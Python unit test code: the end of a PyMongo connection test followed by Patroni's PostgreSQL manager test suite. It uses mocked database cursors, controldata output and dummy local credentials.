self.assertRaises(
(TypeError, ConfigurationError),
lambda: get_connection(auto_start_request=bad_horrible_value)
)
# auto_start_request should default to True
conn = get_connection()
self.assertTrue(conn.auto_start_request)
self.assertTrue(conn.in_request())
pool = conn._Connection__pool
# Request started already, just from Connection constructor - it's a
# bit weird, but Connection does some socket stuff when it initializes
# and it ends up with a request socket
self.assertRequestSocket(pool)
self.assertSameSock(pool)
conn.end_request()
self.assertNoRequest(pool)
self.assertDifferentSock(pool)
# Trigger auto_start_request
conn.db.test.find_one()
self.assertRequestSocket(pool)
self.assertSameSock(pool)
def test_interrupt_signal(self):
if sys.platform.startswith('java'):
# We can't figure out how to raise an exception on a thread that's
# blocked on a socket, whether that's the main thread or a worker,
# without simply killing the whole thread in Jython. This suggests
# PYTHON-294 can't actually occur in Jython.
raise SkipTest("Can't test interrupts in Jython")
# Test fix for PYTHON-294 -- make sure Connection closes its
# socket if it gets an interrupt while waiting to recv() from it.
c = get_connection()
db = c.pymongo_test
# A $where clause which takes 1.5 sec to execute
where = delay(1.5)
# Need exactly 1 document so find() will execute its $where clause once
db.drop_collection('foo')
db.foo.insert({'_id': 1}, safe=True)
def interrupter():
# Raises KeyboardInterrupt in the main thread
time.sleep(0.25)
thread.interrupt_main()
thread.start_new_thread(interrupter, ())
raised = False
try:
# Will be interrupted by a KeyboardInterrupt.
db.foo.find({'$where': where}).next()
except KeyboardInterrupt:
raised = True
# Can't use self.assertRaises() because it doesn't catch system
# exceptions
self.assertTrue(raised, "Didn't raise expected KeyboardInterrupt")
# Raises AssertionError due to PYTHON-294 -- Mongo's response to the
# previous find() is still waiting to be read on the socket, so the
# request id's don't match.
self.assertEqual(
{'_id': 1},
db.foo.find().next()
)
if __name__ == "__main__":
unittest.main()
|
test_postgresql.py
|
import datetime
import mock # for the mock.call method, importing it without a namespace breaks python3
import os
import psycopg2
import shutil
import subprocess
import unittest
from mock import Mock, MagicMock, PropertyMock, patch, mock_open
from patroni.async_executor import CriticalTask
from patroni.dcs import Cluster, ClusterConfig, Leader, Member, RemoteMember, SyncState
from patroni.exceptions import PostgresConnectionException, PostgresException
from patroni.postgresql import Postgresql, STATE_REJECT, STATE_NO_RESPONSE
from patroni.postmaster import PostmasterProcess
from patroni.utils import RetryFailedError
from six.moves import builtins
from threading import Thread, current_thread
class MockCursor(object):
def __init__(self, connection):
self.connection = connection
self.closed = False
self.rowcount = 0
self.results = []
def execute(self, sql, *params):
if sql.startswith('blabla'):
raise psycopg2.ProgrammingError()
elif sql == 'CHECKPOINT' or sql.startswith('SELECT pg_catalog.pg_create_'):
raise psycopg2.OperationalError()
elif sql.startswith('RetryFailedError'):
raise RetryFailedError('retry')
elif sql.startswith('SELECT slot_name'):
self.results = [('blabla', 'physical'), ('foobar', 'physical'), ('ls', 'logical', 'a', 'b')]
elif sql.startswith('SELECT CASE WHEN pg_catalog.pg_is_in_recovery()'):
self.results = [(1, 2)]
elif sql.startswith('SELECT pg_catalog.pg_is_in_recovery()'):
self.results = [(False, 2)]
elif sql.startswith('WITH replication_info AS ('):
replication_info = '[{"application_name":"walreceiver","client_addr":"1.2.3.4",' +\
'"state":"streaming","sync_state":"async","sync_priority":0}]'
self.results = [('', 0, '', '', '', '', False, replication_info)]
elif sql.startswith('SELECT name, setting'):
self.results = [('wal_segment_size', '2048', '8kB', 'integer', 'internal'),
('search_path', 'public', None, 'string', 'user'),
('port', '5433', None, 'integer', 'postmaster'),
('listen_addresses', '*', None, 'string', 'postmaster'),
('autovacuum', 'on', None, 'bool', 'sighup'),
('unix_socket_directories', '/tmp', None, 'string', 'postmaster')]
elif sql.startswith('IDENTIFY_SYSTEM'):
self.results = [('1', 2, '0/402EEC0', '')]
elif sql.startswith('SELECT isdir, modification'):
self.results = [(False, datetime.datetime.now())]
elif sql.startswith('SELECT pg_catalog.pg_read_file'):
self.results = [('1\t0/40159C0\tno recovery target specified\n\n' +
'2\t1/40159C0\tno recovery target specified\n',)]
elif sql.startswith('TIMELINE_HISTORY '):
self.results = [('', b'x\t0/40159C0\tno recovery target specified\n\n' +
b'1\t0/40159C0\tno recovery target specified\n\n' +
b'2\t0/402DD98\tno recovery target specified\n\n' +
b'3\t0/403DD98\tno recovery target specified\n')]
else:
self.results = [(None, None, None, None, None, None, None, None, None, None)]
def fetchone(self):
return self.results[0]
def fetchall(self):
return self.results
def __iter__(self):
for i in self.results:
yield i
def __enter__(self):
return self
def __exit__(self, *args):
pass
class MockConnect(object):
server_version = 99999
autocommit = False
closed = 0
def cursor(self):
return MockCursor(self)
def __enter__(self):
return self
def __exit__(self, *args):
pass
@staticmethod
def close():
pass
class MockPostmaster(object):
def __init__(self, is_running=True, is_single_master=False):
self.is_running = Mock(return_value=is_running)
self.is_single_master = Mock(return_value=is_single_master)
self.wait_for_user_backends_to_close = Mock()
self.signal_stop = Mock(return_value=None)
self.wait = Mock()
def pg_controldata_string(*args, **kwargs):
return b"""
pg_control version number: 942
Catalog version number: 201509161
Database system identifier: 6200971513092291716
Database cluster state: shut down in recovery
pg_control last modified: Fri Oct 2 10:57:06 2015
Latest checkpoint location: 0/30000C8
Prior checkpoint location: 0/2000060
Latest checkpoint's REDO location: 0/3000090
Latest checkpoint's REDO WAL file: 000000020000000000000003
Latest checkpoint's TimeLineID: 2
Latest checkpoint's PrevTimeLineID: 2
Latest checkpoint's full_page_writes: on
Latest checkpoint's NextXID: 0/943
Latest checkpoint's NextOID: 24576
Latest checkpoint's NextMultiXactId: 1
Latest checkpoint's NextMultiOffset: 0
Latest checkpoint's oldestXID: 931
Latest checkpoint's oldestXID's DB: 1
Latest checkpoint's oldestActiveXID: 943
Latest checkpoint's oldestMultiXid: 1
Latest checkpoint's oldestMulti's DB: 1
Latest checkpoint's oldestCommitTs: 0
Latest checkpoint's newestCommitTs: 0
Time of latest checkpoint: Fri Oct 2 10:56:54 2015
Fake LSN counter for unlogged rels: 0/1
Minimum recovery ending location: 0/30241F8
Min recovery ending loc's timeline: 2
Backup start location: 0/0
Backup end location: 0/0
End-of-backup record required: no
wal_level setting: hot_standby
Current wal_log_hints setting: on
Current max_connections setting: 100
Current max_worker_processes setting: 8
Current max_prepared_xacts setting: 0
Current max_locks_per_xact setting: 64
Current track_commit_timestamp setting: off
Maximum data alignment: 8
Database block size: 8192
Blocks per segment of large relation: 131072
WAL block size: 8192
Bytes per WAL segment: 16777216
Maximum length of identifiers: 64
Maximum columns in an index: 32
Maximum size of a TOAST chunk: 1996
Size of a large-object chunk: 2048
Date/time type storage: 64-bit integers
Float4 argument passing: by value
Float8 argument passing: by value
Data page checksum version: 0
"""
def psycopg2_connect(*args, **kwargs):
return MockConnect()
@patch('subprocess.call', Mock(return_value=0))
@patch('psycopg2.connect', psycopg2_connect)
class TestPostgresql(unittest.TestCase):
_PARAMETERS = {'wal_level': 'hot_standby', 'max_replication_slots': 5, 'f.oo': 'bar',
'search_path': 'public', 'hot_standby': 'on', 'max_wal_senders': 5,
'wal_keep_segments': 8, 'wal_log_hints': 'on', 'max_locks_per_transaction': 64,
'max_worker_processes': 8, 'max_connections': 100, 'max_prepared_transactions': 0,
'track_commit_timestamp': 'off', 'unix_socket_directories': '/tmp'}
@patch('subprocess.call', Mock(return_value=0))
@patch('psycopg2.connect', psycopg2_connect)
@patch('os.rename', Mock())
@patch.object(Postgresql, 'get_major_version', Mock(return_value=90600))
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def setUp(self):
self.data_dir = 'data/test0'
self.config_dir = self.data_dir
if not os.path.exists(self.data_dir):
os.makedirs(self.data_dir)
self.p = Postgresql({'name': 'test0', 'scope': 'batman', 'data_dir': self.data_dir,
'config_dir': self.config_dir, 'retry_timeout': 10, 'pgpass': '/tmp/pgpass0',
'listen': '127.0.0.2, 127.0.0.3:5432', 'connect_address': '127.0.0.2:5432',
'authentication': {'superuser': {'username': 'test', 'password': 'test'},
'replication': {'username': 'replicator', 'password': 'rep-pass'}},
'remove_data_directory_on_rewind_failure': True,
'use_pg_rewind': True, 'pg_ctl_timeout': 'bla',
'parameters': self._PARAMETERS,
'recovery_conf': {'foo': 'bar'},
'pg_hba': ['host all all 0.0.0.0/0 md5'],
'callbacks': {'on_start': 'true', 'on_stop': 'true', 'on_reload': 'true',
'on_restart': 'true', 'on_role_change': 'true'}})
self.p._callback_executor = Mock()
self.leadermem = Member(0, 'leader', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5435/postgres'})
self.leader = Leader(-1, 28, self.leadermem)
self.other = Member(0, 'test-1', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5433/postgres',
'tags': {'replicatefrom': 'leader'}})
self.me = Member(0, 'test0', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5434/postgres'})
def tearDown(self):
shutil.rmtree('data')
def test__initdb(self):
self.assertRaises(Exception, self.p.bootstrap, {'initdb': [{'pgdata': 'bar'}]})
self.assertRaises(Exception, self.p.bootstrap, {'initdb': [{'foo': 'bar', 1: 2}]})
self.assertRaises(Exception, self.p.bootstrap, {'initdb': [1]})
self.assertRaises(Exception, self.p.bootstrap, {'initdb': 1})
@patch('os.path.exists', Mock(return_value=True))
@patch('os.unlink', Mock())
def test_delete_trigger_file(self):
self.p.delete_trigger_file()
@patch('subprocess.Popen')
@patch.object(Postgresql, 'wait_for_startup')
@patch.object(Postgresql, 'wait_for_port_open')
@patch.object(Postgresql, 'is_running')
def test_start(self, mock_is_running, mock_wait_for_port_open, mock_wait_for_startup, mock_popen):
mock_is_running.return_value = MockPostmaster()
mock_wait_for_port_open.return_value = True
mock_wait_for_startup.return_value = False
mock_popen.return_value.stdout.readline.return_value = '123'
self.assertTrue(self.p.start())
mock_is_running.return_value = None
mock_postmaster = MockPostmaster()
with patch.object(PostmasterProcess, 'start', return_value=mock_postmaster):
pg_conf = os.path.join(self.data_dir, 'postgresql.conf')
open(pg_conf, 'w').close()
self.assertFalse(self.p.start(task=CriticalTask()))
with open(pg_conf) as f:
lines = f.readlines()
self.assertTrue("f.oo = 'bar'\n" in lines)
mock_wait_for_startup.return_value = None
self.assertFalse(self.p.start(10))
self.assertIsNone(self.p.start())
mock_wait_for_port_open.return_value = False
self.assertFalse(self.p.start())
task = CriticalTask()
task.cancel()
self.assertFalse(self.p.start(task=task))
self.p.cancel()
self.assertFalse(self.p.start())
@patch.object(Postgresql, 'pg_isready')
@patch('patroni.postgresql.polling_loop', Mock(return_value=range(1)))
def test_wait_for_port_open(self, mock_pg_isready):
mock_pg_isready.return_value = STATE_NO_RESPONSE
mock_postmaster = MockPostmaster(is_running=False)
# No pid file and postmaster death
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
mock_postmaster.is_running.return_value = True
# timeout
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
# pg_isready failure
mock_pg_isready.return_value = 'garbage'
self.assertTrue(self.p.wait_for_port_open(mock_postmaster, 1))
# cancelled
self.p.cancel()
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
@patch('time.sleep', Mock())
@patch.object(Postgresql, 'is_running')
@patch.object(Postgresql, '_wait_for_connection_close', Mock())
def test_stop(self, mock_is_running):
# Postmaster is not running
mock_callback = Mock()
mock_is_running.return_value = None
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
# Is running, stopped successfully
mock_is_running.return_value = mock_postmaster = MockPostmaster()
mock_callback.reset_mock()
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
mock_postmaster.signal_stop.assert_called()
# Stop signal failed
mock_postmaster.signal_stop.return_value = False
self.assertFalse(self.p.stop())
# Stop signal failed to find process
mock_postmaster.signal_stop.return_value = True
mock_callback.reset_mock()
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
def test_restart(self):
self.p.start = Mock(return_value=False)
self.assertFalse(self.p.restart())
self.assertEqual(self.p.state, 'restart failed (restarting)')
@patch.object(builtins, 'open', MagicMock())
def test_write_pgpass(self):
self.p.write_pgpass({'host': 'localhost', 'port': '5432', 'user': 'foo'})
self.p.write_pgpass({'host': 'localhost', 'port': '5432', 'user': 'foo', 'password': 'bar'})
def test_checkpoint(self):
with patch.object(MockCursor, 'fetchone', Mock(return_value=(True, ))):
self.assertEqual(self.p.checkpoint({'user': 'postgres'}), 'is_in_recovery=true')
with patch.object(MockCursor, 'execute', Mock(return_value=None)):
self.assertIsNone(self.p.checkpoint())
self.assertEqual(self.p.checkpoint(), 'not accessible or not healty')
@patch.object(Postgresql, 'cancellable_subprocess_call')
@patch('patroni.postgresql.Postgresql.write_pgpass', MagicMock(return_value=dict()))
def test_pg_rewind(self, mock_cancellable_subprocess_call):
r = {'user': '', 'host': '', 'port': '', 'database': '', 'password': ''}
mock_cancellable_subprocess_call.return_value = 0
self.assertTrue(self.p.pg_rewind(r))
mock_cancellable_subprocess_call.side_effect = OSError
self.assertFalse(self.p.pg_rewind(r))
def test_check_recovery_conf(self):
self.p.write_recovery_conf({'primary_conninfo': 'foo'})
self.assertFalse(self.p.check_recovery_conf(None))
self.p.write_recovery_conf({})
self.assertTrue(self.p.check_recovery_conf(None))
@patch.object(Postgresql, 'start', Mock())
@patch.object(Postgresql, 'can_rewind', PropertyMock(return_value=True))
def test__get_local_timeline_lsn(self):
self.p.trigger_check_diverged_lsn()
with patch.object(Postgresql, 'controldata',
Mock(return_value={'Database cluster state': 'shut down in recovery',
'Minimum recovery ending location': '0/0',
"Min recovery ending loc's timeline": '0'})):
self.p.rewind_needed_and_possible(self.leader)
with patch.object(Postgresql, 'is_running', Mock(return_value=True)):
with patch.object(MockCursor, 'fetchone', Mock(side_effect=[(False, ), Exception])):
self.p.rewind_needed_and_possible(self.leader)
@patch.object(Postgresql, 'start', Mock())
@patch.object(Postgresql, 'can_rewind', PropertyMock(return_value=True))
@patch.object(Postgresql, '_get_local_timeline_lsn', Mock(return_value=(2, '40159C1')))
@patch.object(Postgresql, 'check_leader_is_not_in_recovery')
def test__check_timeline_and_lsn(self, mock_check_leader_is_not_in_recovery):
mock_check_leader_is_not_in_recovery.return_value = False
self.p.trigger_check_diverged_lsn()
self.assertFalse(self.p.rewind_needed_and_possible(self.leader))
mock_check_leader_is_not_in_recovery.return_value = True
self.assertFalse(self.p.rewind_needed_and_possible(self.leader))
self.p.trigger_check_diverged_lsn()
with patch('psycopg2.connect', Mock(side_effect=Exception)):
self.assertFalse(self.p.rewind_needed_and_possible(self.leader))
self.p.trigger_check_diverged_lsn()
with patch.object(MockCursor, 'fetchone', Mock(side_effect=[('', 2, '0/0'), ('', b'3\t0/40159C0\tn\n')])):
self.assertFalse(self.p.rewind_needed_and_possible(self.leader))
self.p.trigger_check_diverged_lsn()
with patch.object(MockCursor, 'fetchone', Mock(return_value=('', 1, '0/0'))):
with patch.object(Postgresql, '_get_local_timeline_lsn', Mock(return_value=(1, '0/0'))):
self.assertFalse(self.p.rewind_needed_and_possible(self.leader))
self.p.trigger_check_diverged_lsn()
self.assertTrue(self.p.rewind_needed_and_possible(self.leader))
@patch.object(MockCursor, 'fetchone', Mock(side_effect=[(True,), Exception]))
def test_check_leader_is_not_in_recovery(self):
self.p.check_leader_is_not_in_recovery()
self.p.check_leader_is_not_in_recovery()
@patch.object(Postgresql, 'cancellable_subprocess_call', Mock(return_value=0))
@patch.object(Postgresql, 'checkpoint', side_effect=['', '1'])
@patch.object(Postgresql, 'stop', Mock(return_value=False))
@patch.object(Postgresql, 'start', Mock())
def test_rewind(self, mock_checkpoint):
self.p.rewind(self.leader)
with patch.object(Postgresql, 'pg_rewind', Mock(return_value=False)):
mock_checkpoint.side_effect = ['1', '', '', '']
self.p.rewind(self.leader)
self.p.rewind(self.leader)
with patch.object(Postgresql, 'check_leader_is_not_in_recovery', Mock(return_value=False)):
self.p.rewind(self.leader)
self.p.config['remove_data_directory_on_rewind_failure'] = False
self.p.trigger_check_diverged_lsn()
self.p.rewind(self.leader)
with patch.object(Postgresql, 'is_running', Mock(return_value=True)):
self.p.rewind(self.leader)
self.p.is_leader = Mock(return_value=False)
self.p.rewind(self.leader)
@patch.object(Postgresql, 'is_running', Mock(return_value=False))
@patch.object(Postgresql, 'start', Mock())
def test_follow(self):
m = RemoteMember('1', {'restore_command': '2', 'recovery_min_apply_delay': 3, 'archive_cleanup_command': '4'})
self.p.follow(m)
@patch('subprocess.check_output', Mock(return_value=0, side_effect=pg_controldata_string))
def test_can_rewind(self):
with patch('subprocess.call', MagicMock(return_value=1)):
self.assertFalse(self.p.can_rewind)
with patch('subprocess.call', side_effect=OSError):
self.assertFalse(self.p.can_rewind)
with patch.object(Postgresql, 'controldata', Mock(return_value={'wal_log_hints setting': 'on'})):
self.assertTrue(self.p.can_rewind)
self.p.config['use_pg_rewind'] = False
self.assertFalse(self.p.can_rewind)
@patch('time.sleep', Mock())
@patch.object(Postgresql, 'cancellable_subprocess_call')
@patch.object(Postgresql, 'remove_data_directory', Mock(return_value=True))
def test_create_replica(self, mock_cancellable_subprocess_call):
self.p.delete_trigger_file = Mock(side_effect=OSError)
self.p.config['create_replica_methods'] = ['pgBackRest']
self.p.config['pgBackRest'] = {'command': 'pgBackRest', 'keep_data': True, 'no_params': True}
mock_cancellable_subprocess_call.return_value = 0
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['create_replica_methods'] = ['wale', 'basebackup']
self.p.config['wale'] = {'command': 'foo'}
self.assertEqual(self.p.create_replica(self.leader), 0)
del self.p.config['wale']
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['create_replica_methods'] = ['basebackup']
self.p.config['basebackup'] = [{'max_rate': '100M'}, 'no-sync']
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['basebackup'] = [{'max_rate': '100M', 'compress': '9'}]
with mock.patch('patroni.postgresql.logger.error', new_callable=Mock()) as mock_logger:
self.p.create_replica(self.leader)
mock_logger.assert_called_once()
self.assertTrue("only one key-value is allowed and value should be a string" in mock_logger.call_args[0][0],
"not matching {0}".format(mock_logger.call_args[0][0]))
self.p.config['basebackup'] = [42]
with mock.patch('patroni.postgresql.logger.error', new_callable=Mock()) as mock_logger:
self.p.create_replica(self.leader)
mock_logger.assert_called_once()
self.assertTrue("value should be string value or a single key-value pair" in mock_logger.call_args[0][0],
"not matching {0}".format(mock_logger.call_args[0][0]))
self.p.config['basebackup'] = {"foo": "bar"}
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['create_replica_methods'] = ['wale', 'basebackup']
del self.p.config['basebackup']
mock_cancellable_subprocess_call.return_value = 1
self.assertEqual(self.p.create_replica(self.leader), 1)
mock_cancellable_subprocess_call.side_effect = Exception('foo')
self.assertEqual(self.p.create_replica(self.leader), 1)
mock_cancellable_subprocess_call.side_effect = [1, 0]
self.assertEqual(self.p.create_replica(self.leader), 0)
mock_cancellable_subprocess_call.side_effect = [Exception(), 0]
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.cancel()
self.assertEqual(self.p.create_replica(self.leader), 1)
@patch('time.sleep', Mock())
@patch.object(Postgresql, 'cancellable_subprocess_call')
@patch.object(Postgresql, 'remove_data_directory', Mock(return_value=True))
def test_create_replica_old_format(self, mock_cancellable_subprocess_call):
""" The same test as before but with old 'create_replica_method'
to test backward compatibility
"""
self.p.delete_trigger_file = Mock(side_effect=OSError)
self.p.config['create_replica_method'] = ['wale', 'basebackup']
self.p.config['wale'] = {'command': 'foo'}
mock_cancellable_subprocess_call.return_value = 0
self.assertEqual(self.p.create_replica(self.leader), 0)
del self.p.config['wale']
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['create_replica_method'] = ['basebackup']
self.p.config['basebackup'] = [{'max_rate': '100M'}, 'no-sync']
self.assertEqual(self.p.create_replica(self.leader), 0)
self.p.config['create_replica_method'] = ['wale', 'basebackup']
del self.p.config['basebackup']
mock_cancellable_subprocess_call.return_value = 1
self.assertEqual(self.p.create_replica(self.leader), 1)
def test_basebackup(self):
self.p.cancel()
self.p.basebackup(None, None, {'foo': 'bar'})
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def test_sync_replication_slots(self):
self.p.start()
config = ClusterConfig(1, {'slots': {'ls': {'database': 'a', 'plugin': 'b'},
'A': 0, 'test_3': 0, 'b': {'type': 'logical', 'plugin': '1'}}}, 1)
cluster = Cluster(True, config, self.leader, 0, [self.me, self.other, self.leadermem], None, None, None)
with mock.patch('patroni.postgresql.Postgresql._query', Mock(side_effect=psycopg2.OperationalError)):
self.p.sync_replication_slots(cluster)
self.p.sync_replication_slots(cluster)
with mock.patch('patroni.postgresql.Postgresql.role', new_callable=PropertyMock(return_value='replica')):
self.p.sync_replication_slots(cluster)
with patch.object(Postgresql, 'drop_replication_slot', Mock(return_value=True)),\
patch('patroni.dcs.logger.error', new_callable=Mock()) as errorlog_mock:
self.p.query = Mock()
alias1 = Member(0, 'test-3', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5436/postgres'})
alias2 = Member(0, 'test.3', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5436/postgres'})
cluster.members.extend([alias1, alias2])
self.p.sync_replication_slots(cluster)
self.assertEqual(errorlog_mock.call_count, 5)
ca = errorlog_mock.call_args_list[0][0][1]
self.assertTrue("test-3" in ca, "non matching {0}".format(ca))
self.assertTrue("test.3" in ca, "non matching {0}".format(ca))
@patch.object(MockCursor, 'execute', Mock(side_effect=psycopg2.OperationalError))
def test__query(self):
self.assertRaises(PostgresConnectionException, self.p._query, 'blabla')
self.p._state = 'restarting'
self.assertRaises(RetryFailedError, self.p._query, 'blabla')
def test_query(self):
self.p.query('select 1')
self.assertRaises(PostgresConnectionException, self.p.query, 'RetryFailedError')
self.assertRaises(psycopg2.ProgrammingError, self.p.query, 'blabla')
@patch.object(Postgresql, 'pg_isready', Mock(return_value=STATE_REJECT))
def test_is_leader(self):
self.assertTrue(self.p.is_leader())
self.p.reset_cluster_info_state()
with patch.object(Postgresql, '_query', Mock(side_effect=RetryFailedError(''))):
self.assertRaises(PostgresConnectionException, self.p.is_leader)
def test_reload(self):
self.assertTrue(self.p.reload())
@patch.object(Postgresql, 'is_running')
def test_is_healthy(self, mock_is_running):
mock_is_running.return_value = True
self.assertTrue(self.p.is_healthy())
mock_is_running.return_value = False
self.assertFalse(self.p.is_healthy())
def test_promote(self):
self.p.set_role('replica')
self.assertIsNone(self.p.promote(0))
self.assertTrue(self.p.promote(0))
def test_timeline_wal_position(self):
self.assertEqual(self.p.timeline_wal_position(), (1, 2))
Thread(target=self.p.timeline_wal_position).start()
@patch.object(PostmasterProcess, 'from_pidfile')
def test_is_running(self, mock_frompidfile):
# Cached postmaster running
mock_postmaster = self.p._postmaster_proc = MockPostmaster()
self.assertEqual(self.p.is_running(), mock_postmaster)
# Cached postmaster not running, no postmaster running
mock_postmaster.is_running.return_value = False
mock_frompidfile.return_value = None
self.assertEqual(self.p.is_running(), None)
self.assertEqual(self.p._postmaster_proc, None)
# No cached postmaster, postmaster running
mock_frompidfile.return_value = mock_postmaster2 = MockPostmaster()
self.assertEqual(self.p.is_running(), mock_postmaster2)
self.assertEqual(self.p._postmaster_proc, mock_postmaster2)
@patch('shlex.split', Mock(side_effect=OSError))
def test_call_nowait(self):
self.p.set_role('replica')
self.assertIsNone(self.p.call_nowait('on_start'))
self.p.bootstrapping = True
self.assertIsNone(self.p.call_nowait('on_start'))
def test_non_existing_callback(self):
self.assertFalse(self.p.call_nowait('foobar'))
@patch.object(Postgresql, 'is_running', Mock(return_value=MockPostmaster()))
def test_is_leader_exception(self):
self.p.start()
self.p.query = Mock(side_effect=psycopg2.OperationalError("not supported"))
self.assertTrue(self.p.stop())
@patch('os.rename', Mock())
@patch('os.path.isdir', Mock(return_value=True))
def test_move_data_directory(self):
self.p.move_data_directory()
with patch('os.rename', Mock(side_effect=OSError)):
self.p.move_data_directory()
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def test_bootstrap(self):
with patch('subprocess.call', Mock(return_value=1)):
self.assertFalse(self.p.bootstrap({}))
config = {'users': {'replicator': {'password': 'rep-pass', 'options': ['replication']}}}
self.p.bootstrap(config)
with open(os.path.join(self.config_dir, 'pg_hba.conf')) as f:
lines = f.readlines()
self.assertTrue('host all all 0.0.0.0/0 md5\n' in lines)
self.p.config.pop('pg_hba')
config.update({'post_init': '/bin/false',
'pg_hba': ['host replication replicator 127.0.0.1/32 md5',
'hostssl all all 0.0.0.0/0 md5',
'host all all 0.0.0.0/0 md5']})
self.p.bootstrap(config)
with open(os.path.join(self.data_dir, 'pg_hba.conf')) as f:
lines = f.readlines()
self.assertTrue('host replication replicator 127.0.0.1/32 md5\n' in lines)
@patch.object(Postgresql, 'cancellable_subprocess_call')
def test_custom_bootstrap(self, mock_cancellable_subprocess_call):
self.p.config.pop('pg_hba')
config = {'method': 'foo', 'foo': {'command': 'bar'}}
mock_cancellable_subprocess_call.return_value = 1
self.assertFalse(self.p.bootstrap(config))
mock_cancellable_subprocess_call.return_value = 0
with patch('subprocess.Popen', Mock(side_effect=Exception("42"))),\
patch('os.path.isfile', Mock(return_value=True)),\
patch('os.unlink', Mock()),\
patch.object(Postgresql, 'save_configuration_files', Mock()),\
patch.object(Postgresql, 'restore_configuration_files', Mock()),\
patch.object(Postgresql, 'write_recovery_conf', Mock()):
with self.assertRaises(Exception) as e:
self.p.bootstrap(config)
self.assertEqual(str(e.exception), '42')
config['foo']['recovery_conf'] = {'foo': 'bar'}
with self.assertRaises(Exception) as e:
self.p.bootstrap(config)
self.assertEqual(str(e.exception), '42')
mock_cancellable_subprocess_call.side_effect = Exception
self.assertFalse(self.p.bootstrap(config))
@patch('time.sleep', Mock())
@patch('os.unlink', Mock())
@patch('os.path.isfile', Mock(return_value=True))
@patch.object(Postgresql, 'run_bootstrap_post_init', Mock(return_value=True))
@patch.object(Postgresql, '_custom_bootstrap', Mock(return_value=True))
@patch.object(Postgresql, 'start', Mock(return_value=True))
def test_post_bootstrap(self):
config = {'method': 'foo', 'foo': {'command': 'bar'}}
self.p.bootstrap(config)
task = CriticalTask()
with patch.object(Postgresql, 'create_or_update_role', Mock(side_effect=Exception)):
self.p.post_bootstrap({}, task)
self.assertFalse(task.result)
self.p.config.pop('pg_hba')
self.p.post_bootstrap({}, task)
self.assertTrue(task.result)
self.p.bootstrap(config)
with patch.object(Postgresql, 'pending_restart', PropertyMock(return_value=True)), \
patch.object(Postgresql, 'restart', Mock()) as mock_restart:
self.p.post_bootstrap({}, task)
mock_restart.assert_called_once()
self.p.bootstrap(config)
self.p.set_state('stopped')
self.p.reload_config({'authentication': {'superuser': {'username': 'p', 'password': 'p'},
'replication': {'username': 'r', 'password': 'r'}},
'listen': '*', 'retry_timeout': 10, 'parameters': {'hba_file': 'foo'}})
with patch.object(Postgresql, 'restart', Mock()) as mock_restart:
self.p.post_bootstrap({}, task)
mock_restart.assert_called_once()
@patch.object(Postgresql, 'cancellable_subprocess_call')
def test_run_bootstrap_post_init(self, mock_cancellable_subprocess_call):
mock_cancellable_subprocess_call.return_value = 1
self.assertFalse(self.p.run_bootstrap_post_init({'post_init': '/bin/false'}))
mock_cancellable_subprocess_call.return_value = 0
self.p._superuser.pop('username')
self.assertTrue(self.p.run_bootstrap_post_init({'post_init': '/bin/false'}))
mock_cancellable_subprocess_call.assert_called()
args, kwargs = mock_cancellable_subprocess_call.call_args
self.assertTrue('PGPASSFILE' in kwargs['env'])
self.assertEqual(args[0], ['/bin/false', 'postgres://127.0.0.2:5432/postgres'])
mock_cancellable_subprocess_call.reset_mock()
self.p._local_address.pop('host')
self.assertTrue(self.p.run_bootstrap_post_init({'post_init': '/bin/false'}))
mock_cancellable_subprocess_call.assert_called()
self.assertEqual(mock_cancellable_subprocess_call.call_args[0][0], ['/bin/false', 'postgres://:5432/postgres'])
mock_cancellable_subprocess_call.side_effect = OSError
self.assertFalse(self.p.run_bootstrap_post_init({'post_init': '/bin/false'}))
@patch('patroni.postgresql.Postgresql.create_replica', Mock(return_value=0))
def test_clone(self):
self.p.clone(self.leader)
@patch('os.listdir', Mock(return_value=['recovery.conf']))
@patch('os.path.exists', Mock(return_value=True))
def test_get_postgres_role_from_data_directory(self):
self.assertEqual(self.p.get_postgres_role_from_data_directory(), 'replica')
def test_remove_data_directory(self):
self.p.remove_data_directory()
open(self.data_dir, 'w').close()
self.p.remove_data_directory()
os.symlink('unexisting', self.data_dir)
with patch('os.unlink', Mock(side_effect=OSError)):
self.p.remove_data_directory()
self.p.remove_data_directory()
@patch('patroni.postgresql.Postgresql._version_file_exists', Mock(return_value=True))
def test_controldata(self):
with patch('subprocess.check_output', Mock(return_value=0, side_effect=pg_controldata_string)):
data = self.p.controldata()
self.assertEqual(len(data), 50)
self.assertEqual(data['Database cluster state'], 'shut down in recovery')
self.assertEqual(data['wal_log_hints setting'], 'on')
self.assertEqual(int(data['Database block size']), 8192)
with patch('subprocess.check_output', Mock(side_effect=subprocess.CalledProcessError(1, ''))):
self.assertEqual(self.p.controldata(), {})
@patch('patroni.postgresql.Postgresql._version_file_exists', Mock(return_value=True))
@patch('subprocess.check_output', MagicMock(return_value=0, side_effect=pg_controldata_string))
def test_sysid(self):
self.assertEqual(self.p.sysid, "6200971513092291716")
@patch('os.path.isfile', Mock(return_value=True))
@patch('shutil.copy', Mock(side_effect=IOError))
def test_save_configuration_files(self):
self.p.save_configuration_files()
@patch('os.path.isfile', Mock(side_effect=[False, True]))
@patch('shutil.copy', Mock(side_effect=IOError))
def test_restore_configuration_files(self):
self.p.restore_configuration_files()
def test_can_create_replica_without_replication_connection(self):
self.p.config['create_replica_method'] = []
self.assertFalse(self.p.can_create_replica_without_replication_connection())
self.p.config['create_replica_method'] = ['wale', 'basebackup']
